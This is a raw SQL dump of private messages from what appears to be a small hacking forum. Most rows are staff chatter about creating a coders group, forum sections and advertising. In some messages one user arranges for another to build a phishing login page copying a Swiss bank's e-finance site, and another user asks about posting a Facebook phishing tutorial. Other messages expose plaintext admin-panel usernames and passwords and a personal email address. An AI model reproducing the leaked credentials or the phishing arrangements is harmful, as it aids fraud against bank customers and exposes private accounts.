'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: phishing', '0', '[quote=\'sirchamp\']\r\ncan you make a copy of this website ? https://www.postfinance.ch/\r\nmy email : phonomarco@yahoo.de\r\n\r\nthanks alot\r\n[/quote]\r\nWhich of these 2 you would like to have as login/phising page: \r\n\r\nLogin E-Finance\r\nLogin E-Trading', '1345113368', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('141', '53', '64', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"64\";}}', '2', 'Re: phishing', '0', '[quote=\'vlajke\']\r\n[quote=\'sirchamp\']\r\ncan you make a copy of this website ? https://www.postfinance.ch/\r\nmy email : phonomarco@yahoo.de\r\n\r\nthanks alot\r\n[/quote]\r\nWhich of these 2 you would like to have as login/phising page: \r\n\r\nLogin E-Finance\r\nLogin E-Trading\r\n[/quote]\r\n\r\n\r\n\r\n\r\nLogin E-Finance please. Thanks a bunch', '1345113462', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('144', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Coders group', '0', 'I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below.\r\n\r\nhttp://l33thacking.com/showthread.php?tid=2\r\n\r\nAlso, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. ', '1345133374', '0', '3', '1345135007', '1', '0', '0', '1345133744'); INSERT INTO mybb_privatemessages VALUES('146', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders group', '0', '[quote=\'t3h jok3r\']\r\nI\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below.\r\n\r\nhttp://l33thacking.com/showthread.php?tid=2\r\n\r\nAlso, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. \r\n[/quote]\r\n\r\nCan you use this direct link incase i want to edit it?\r\nhttps://dl.dropbox.com/u/33062220/Coders.png', '1345135007', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('147', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders group', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below.\r\n\r\nhttp://l33thacking.com/showthread.php?tid=2\r\n\r\nAlso, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. \r\n[/quote]\r\n\r\nCan you use this direct link incase i want to edit it?\r\nhttps://dl.dropbox.com/u/33062220/Coders.png\r\n[/quote]\r\n\r\nSure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? \r\n\r\n', '1345141272', '0', '3', '1345147112', '1', '0', '0', '1345147064'); INSERT INTO mybb_privatemessages VALUES('149', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders group', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below.\r\n\r\nhttp://l33thacking.com/showthread.php?tid=2\r\n\r\nAlso, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. \r\n[/quote]\r\n\r\nCan you use this direct link incase i want to edit it?\r\nhttps://dl.dropbox.com/u/33062220/Coders.png\r\n[/quote]\r\n\r\nSure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? \r\n[/quote]\r\n\r\nHmm, am i able to Change the group image link in the group settings?', '1345147112', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('153', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders group', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below.\r\n\r\nhttp://l33thacking.com/showthread.php?tid=2\r\n\r\nAlso, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. \r\n[/quote]\r\n\r\nCan you use this direct link incase i want to edit it?\r\nhttps://dl.dropbox.com/u/33062220/Coders.png\r\n[/quote]\r\n\r\nSure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? \r\n[/quote]\r\n\r\nHmm, am i able to Change the group image link in the group settings?\r\n[/quote]\r\n\r\nLol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add?', '1345149186', '0', '3', '1345149811', '1', '0', '0', '1345149552'); INSERT INTO mybb_privatemessages VALUES('155', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders group', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below.\r\n\r\nhttp://l33thacking.com/showthread.php?tid=2\r\n\r\nAlso, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. \r\n[/quote]\r\n\r\nCan you use this direct link incase i want to edit it?\r\nhttps://dl.dropbox.com/u/33062220/Coders.png\r\n[/quote]\r\n\r\nSure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? \r\n[/quote]\r\n\r\nHmm, am i able to Change the group image link in the group settings?\r\n[/quote]\r\n\r\nLol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add?\r\n[/quote]\r\n\r\nhmm k.\r\n[General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace]\r\n\r\nUnder Coding: \r\n\r\n[Forum]\r\n(icon1)VB.Net\r\n(icon2)Java\r\n\r\nicon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon\r\nicon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon', '1345149811', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('156', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders group', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below.\r\n\r\nhttp://l33thacking.com/showthread.php?tid=2\r\n\r\nAlso, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. \r\n[/quote]\r\n\r\nCan you use this direct link incase i want to edit it?\r\nhttps://dl.dropbox.com/u/33062220/Coders.png\r\n[/quote]\r\n\r\nSure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? \r\n[/quote]\r\n\r\nHmm, am i able to Change the group image link in the group settings?\r\n[/quote]\r\n\r\nLol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add?\r\n[/quote]\r\n\r\nhmm k.\r\n[General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace]\r\n\r\nUnder Coding: \r\n\r\n[Forum]\r\n(icon1)VB.Net\r\n(icon2)Java\r\n\r\nicon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon\r\nicon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon\r\n[/quote]\r\n\r\nWow, I didn\'t expect so much information. Anyway, thanks.\r\n\r\nI have added the group.\r\n\r\nYou can view it at http://l33thacking.com/usercp.php?action=usergroups\r\n\r\nYou are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two.\r\n\r\nYour sections (Forums) will be up in a few minutes. ', '1345150007', '0', '3', '1345155106', '1', '0', '0', '1345155041'); INSERT INTO mybb_privatemessages VALUES('161', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders group', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below.\r\n\r\nhttp://l33thacking.com/showthread.php?tid=2\r\n\r\nAlso, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. \r\n[/quote]\r\n\r\nCan you use this direct link incase i want to edit it?\r\nhttps://dl.dropbox.com/u/33062220/Coders.png\r\n[/quote]\r\n\r\nSure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? \r\n[/quote]\r\n\r\nHmm, am i able to Change the group image link in the group settings?\r\n[/quote]\r\n\r\nLol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add?\r\n[/quote]\r\n\r\nhmm k.\r\n[General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace]\r\n\r\nUnder Coding: \r\n\r\n[Forum]\r\n(icon1)VB.Net\r\n(icon2)Java\r\n\r\nicon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon\r\nicon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon\r\n[/quote]\r\n\r\nWow, I didn\'t expect so much information. Anyway, thanks.\r\n\r\nI have added the group.\r\n\r\nYou can view it at http://l33thacking.com/usercp.php?action=usergroups\r\n\r\nYou are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two.\r\n\r\nYour sections (Forums) will be up in a few minutes. \r\n[/quote]\r\n\r\nhaha, thanks :)', '1345155106', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('162', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders group', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below.\r\n\r\nhttp://l33thacking.com/showthread.php?tid=2\r\n\r\nAlso, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. \r\n[/quote]\r\n\r\nCan you use this direct link incase i want to edit it?\r\nhttps://dl.dropbox.com/u/33062220/Coders.png\r\n[/quote]\r\n\r\nSure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? \r\n[/quote]\r\n\r\nHmm, am i able to Change the group image link in the group settings?\r\n[/quote]\r\n\r\nLol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add?\r\n[/quote]\r\n\r\nhmm k.\r\n[General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace]\r\n\r\nUnder Coding: \r\n\r\n[Forum]\r\n(icon1)VB.Net\r\n(icon2)Java\r\n\r\nicon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon\r\nicon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon\r\n[/quote]\r\n\r\nWow, I didn\'t expect so much information. Anyway, thanks.\r\n\r\nI have added the group.\r\n\r\nYou can view it at http://l33thacking.com/usercp.php?action=usergroups\r\n\r\nYou are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two.\r\n\r\nYour sections (Forums) will be up in a few minutes. \r\n[/quote]\r\n\r\nhaha, thanks :)\r\n[/quote]\r\n\r\nNo problem. Tomorrow, I will add a groups forum so people can apply. ', '1345156584', '0', '3', '1345163653', '1', '0', '0', '1345162899'); INSERT INTO mybb_privatemessages VALUES('164', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders group', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below.\r\n\r\nhttp://l33thacking.com/showthread.php?tid=2\r\n\r\nAlso, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. \r\n[/quote]\r\n\r\nCan you use this direct link incase i want to edit it?\r\nhttps://dl.dropbox.com/u/33062220/Coders.png\r\n[/quote]\r\n\r\nSure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? \r\n[/quote]\r\n\r\nHmm, am i able to Change the group image link in the group settings?\r\n[/quote]\r\n\r\nLol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add?\r\n[/quote]\r\n\r\nhmm k.\r\n[General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace]\r\n\r\nUnder Coding: \r\n\r\n[Forum]\r\n(icon1)VB.Net\r\n(icon2)Java\r\n\r\nicon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon\r\nicon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon\r\n[/quote]\r\n\r\nWow, I didn\'t expect so much information. Anyway, thanks.\r\n\r\nI have added the group.\r\n\r\nYou can view it at http://l33thacking.com/usercp.php?action=usergroups\r\n\r\nYou are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two.\r\n\r\nYour sections (Forums) will be up in a few minutes. \r\n[/quote]\r\n\r\nhaha, thanks :)\r\n[/quote]\r\n\r\nNo problem. Tomorrow, I will add a groups forum so people can apply. \r\n[/quote]\r\n\r\nkk :D', '1345163653', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('176', '53', '54', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: Question', '0', '[quote=\'Sin Cara\']\r\n[quote=\'sirchamp\']\r\nHey Sin Cara\r\nIm not sure if im allowed to make a tutorial for a facebook phishing page.\r\nSo i wanna ask if i am allowed to do that tutorial.\r\nIm asking this because it said somewhere no blackhat activities ...\r\nThx and regards\r\n[/quote]\r\nno.. you can\'t.\r\n[/quote]\r\ni already asked the joker he said its alright', '1345193782', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('178', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders group', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below.\r\n\r\nhttp://l33thacking.com/showthread.php?tid=2\r\n\r\nAlso, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. \r\n[/quote]\r\n\r\nCan you use this direct link incase i want to edit it?\r\nhttps://dl.dropbox.com/u/33062220/Coders.png\r\n[/quote]\r\n\r\nSure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? \r\n[/quote]\r\n\r\nHmm, am i able to Change the group image link in the group settings?\r\n[/quote]\r\n\r\nLol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add?\r\n[/quote]\r\n\r\nhmm k.\r\n[General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace]\r\n\r\nUnder Coding: \r\n\r\n[Forum]\r\n(icon1)VB.Net\r\n(icon2)Java\r\n\r\nicon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon\r\nicon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon\r\n[/quote]\r\n\r\nWow, I didn\'t expect so much information. Anyway, thanks.\r\n\r\nI have added the group.\r\n\r\nYou can view it at http://l33thacking.com/usercp.php?action=usergroups\r\n\r\nYou are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two.\r\n\r\nYour sections (Forums) will be up in a few minutes. \r\n[/quote]\r\n\r\nhaha, thanks :)\r\n[/quote]\r\n\r\nNo problem. Tomorrow, I will add a groups forum so people can apply. \r\n[/quote]\r\n\r\nkk :D\r\n[/quote]\r\n\r\nBTW, is the current group description OK or would you like it to be changed? ', '1345209186', '0', '3', '1345217328', '1', '0', '0', '1345217216'); INSERT INTO mybb_privatemessages VALUES('183', '53', '54', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: Question', '0', '[quote=\'Sin Cara\']\r\n[quote=\'sirchamp\']\r\n[quote=\'Sin Cara\']\r\n[quote=\'sirchamp\']\r\nHey Sin Cara\r\nIm not sure if im allowed to make a tutorial for a facebook phishing page.\r\nSo i wanna ask if i am allowed to do that tutorial.\r\nIm asking this because it said somewhere no blackhat activities ...\r\nThx and regards\r\n[/quote]\r\nno.. you can\'t.\r\n[/quote]\r\ni already asked the joker he said its alright\r\n[/quote]\r\nthen sorry for the inconvenience...\r\ni m new here :)\r\n[/quote]\r\n\r\nxD no problem. Im also new here^^', '1345216955', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('187', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders group', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below.\r\n\r\nhttp://l33thacking.com/showthread.php?tid=2\r\n\r\nAlso, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. \r\n[/quote]\r\n\r\nCan you use this direct link incase i want to edit it?\r\nhttps://dl.dropbox.com/u/33062220/Coders.png\r\n[/quote]\r\n\r\nSure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? \r\n[/quote]\r\n\r\nHmm, am i able to Change the group image link in the group settings?\r\n[/quote]\r\n\r\nLol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add?\r\n[/quote]\r\n\r\nhmm k.\r\n[General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace]\r\n\r\nUnder Coding: \r\n\r\n[Forum]\r\n(icon1)VB.Net\r\n(icon2)Java\r\n\r\nicon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon\r\nicon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon\r\n[/quote]\r\n\r\nWow, I didn\'t expect so much information. Anyway, thanks.\r\n\r\nI have added the group.\r\n\r\nYou can view it at http://l33thacking.com/usercp.php?action=usergroups\r\n\r\nYou are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two.\r\n\r\nYour sections (Forums) will be up in a few minutes. \r\n[/quote]\r\n\r\nhaha, thanks :)\r\n[/quote]\r\n\r\nNo problem. Tomorrow, I will add a groups forum so people can apply. \r\n[/quote]\r\n\r\nkk :D\r\n[/quote]\r\n\r\nBTW, is the current group description OK or would you like it to be changed? \r\n[/quote]\r\n\r\nIts nice :)', '1345217328', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('188', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders group', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\nI\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below.\r\n\r\nhttp://l33thacking.com/showthread.php?tid=2\r\n\r\nAlso, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. \r\n[/quote]\r\n\r\nCan you use this direct link incase i want to edit it?\r\nhttps://dl.dropbox.com/u/33062220/Coders.png\r\n[/quote]\r\n\r\nSure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? \r\n[/quote]\r\n\r\nHmm, am i able to Change the group image link in the group settings?\r\n[/quote]\r\n\r\nLol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add?\r\n[/quote]\r\n\r\nhmm k.\r\n[General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace]\r\n\r\nUnder Coding: \r\n\r\n[Forum]\r\n(icon1)VB.Net\r\n(icon2)Java\r\n\r\nicon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon\r\nicon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon\r\n[/quote]\r\n\r\nWow, I didn\'t expect so much information. Anyway, thanks.\r\n\r\nI have added the group.\r\n\r\nYou can view it at http://l33thacking.com/usercp.php?action=usergroups\r\n\r\nYou are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two.\r\n\r\nYour sections (Forums) will be up in a few minutes. \r\n[/quote]\r\n\r\nhaha, thanks :)\r\n[/quote]\r\n\r\nNo problem. Tomorrow, I will add a groups forum so people can apply. \r\n[/quote]\r\n\r\nkk :D\r\n[/quote]\r\n\r\nBTW, is the current group description OK or would you like it to be changed? \r\n[/quote]\r\n\r\nIts nice :)\r\n[/quote]\r\n\r\nThanks. ', '1345217449', '0', '1', '0', '1', '0', '0', '1345219288'); INSERT INTO mybb_privatemessages VALUES('190', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Money', '0', '[quote=\'t3h jok3r\']\r\nYo, sorry man. I\'m waiting for my dad to add some funds tomorrow on my PayPal because I need around $40 so my dad told me that he will add the funds, all in one go tomorrow. So tomorrow I\'ll give you your money as well.\r\n\r\nBy the way, I\'m going to be using adbrite for ads on my website. I wanted to know if I should have inline ads?\r\n\r\nInline= Ads between posts\r\n[/quote]\r\nNo inline adds I hate those. :P and the money thing is not a rush man It is not like some guy is holding me hostage for a ransom. xD lol \r\n\r\nPs please stop saying my website I know it is yours but call it like the site or something . :)', '1345220662', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('195', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Money', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nYo, sorry man. I\'m waiting for my dad to add some funds tomorrow on my PayPal because I need around $40 so my dad told me that he will add the funds, all in one go tomorrow. So tomorrow I\'ll give you your money as well.\r\n\r\nBy the way, I\'m going to be using adbrite for ads on my website. I wanted to know if I should have inline ads?\r\n\r\nInline= Ads between posts\r\n[/quote]\r\nNo inline adds I hate those. :P and the money thing is not a rush man It is not like some guy is holding me hostage for a ransom. xD lol \r\n\r\nPs please stop saying my website I know it is yours but call it like the site or something . :)\r\n[/quote]\r\n\r\nDude, I just realized it that I kept on saying my website lol. My bad also I bought ads spot on 2 sites and buying more today. Investing all my money left into ads and members and I also get 100 free backlinks from a website found on Google.\r\n\r\nI hope this site gets popular soon.\r\n\r\nBTW I need to make your a account to access ACP, give me a username(diff from LH) and a password. \r\n[/quote]\r\nGood I hope we get people! :)\r\nI thought I already had a admin cp account?\r\n\r\nUser:tehjokerlovespenis\r\nPass:iamasexyadmin12\r\n\r\n', '1345226476', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('197', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Astro PID', '0', '[quote=\'t3h jok3r\']\r\nThanks for the contribution. I have moved your thread to the PIDs forum, I\'m sending this message so you know where the thread is and don\'t think it got junked.\r\n\r\nThanks once again for contributing. Have a great day. \r\n[/quote]\r\n\r\nThanks man, Hope everyone enjoys it :)', '1345229859', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('199', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Astro PID', '0', 'By the way. Id love to take on a job for these forums since Iv been looking for something new, I\'m not looking for profits or anything like that. I just want to help you guys make this work. I can help out or maybe take on a higher position, Keep it in mind if you ever need someone. like I said I\'m not interested in taking any of your profits id just love to help out more tis all.', '1345231530', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('204', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Money', '0', 'User:poopipie\r\nPass:sosecret32\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nYo, sorry man. I\'m waiting for my dad to add some funds tomorrow on my PayPal because I need around $40 so my dad told me that he will add the funds, all in one go tomorrow. So tomorrow I\'ll give you your money as well.\r\n\r\nBy the way, I\'m going to be using adbrite for ads on my website. I wanted to know if I should have inline ads?\r\n\r\nInline= Ads between posts\r\n[/quote]\r\nNo inline adds I hate those. :P and the money thing is not a rush man It is not like some guy is holding me hostage for a ransom. xD lol \r\n\r\nPs please stop saying my website I know it is yours but call it like the site or something . :)\r\n[/quote]\r\n\r\nDude, I just realized it that I kept on saying my website lol. My bad also I bought ads spot on 2 sites and buying more today. Investing all my money left into ads and members and I also get 100 free backlinks from a website found on Google.\r\n\r\nI hope this site gets popular soon.\r\n\r\nBTW I need to make your a account to access ACP, give me a username(diff from LH) and a password. \r\n[/quote]\r\nGood I hope we get people! :)\r\nI thought I already had a admin cp account?\r\n\r\nUser:tehjokerlovespenis\r\nPass:iamasexyadmin12\r\n\r\n\r\n[/quote]\r\n\r\nYou do. But when you go on the admincp, it asks for a bypass because I have password protected the admin directory. After you bypass the password protected directory then you will be taken to the admin login page. Then you enter your FORUM USERNAME and PASSWORD including the secret pin.\r\n\r\nCome on, give a a proper username and pass mayne. \r\n[/quote]', '1345241308', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('207', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Astro PID', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nBy the way. Id love to take on a job for these forums since Iv been looking for something new, I\'m not looking for profits or anything like that. I just want to help you guys make this work. I can help out or maybe take on a higher position, Keep it in mind if you ever need someone. like I said I\'m not interested in taking any of your profits id just love to help out more tis all.\r\n[/quote]\r\n\r\nThanks, I was really thinking of keeping one more staff member or admin but I was hoping if they could refer some HQ members. \r\n[/quote]\r\n\r\nOr if you\'d like to make 